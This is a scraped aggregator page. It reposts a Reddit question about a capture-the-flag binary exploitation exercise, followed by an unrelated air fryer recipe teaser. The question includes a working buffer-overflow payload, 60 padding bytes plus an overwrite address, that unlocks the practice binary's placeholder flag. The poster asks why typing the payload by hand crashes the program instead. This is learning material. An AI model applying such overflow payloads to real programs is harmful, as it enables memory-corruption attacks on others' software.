Question about binary exploitation

Quick question, why does this work here. console python2 -c 'print 60 * "A" + "\xfa\xaf\xad\x0b"' > payload

console ./ctf < payload Your password: FLAG{xxxx.xxxx} But when I write it out, it no longer works? console ./ctf Your password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xfa\xaf\xad\x0b Segmentation fault (core dumped)

submitted by /u/triggeredStar
[link] [comments]

Read More >>

Foods You Didn’t Know You Could Make in an Air Fryer

Foods You Didn’t Know , You Could Make in an Air Fryer. Yardbarker recently shared some creative ways to use an air fryer that you may not have thought of before. Baked Potatoes, Poke holes in a potato, air fry at 390 degrees Fahrenheit for 40 minutes,…

Read More >>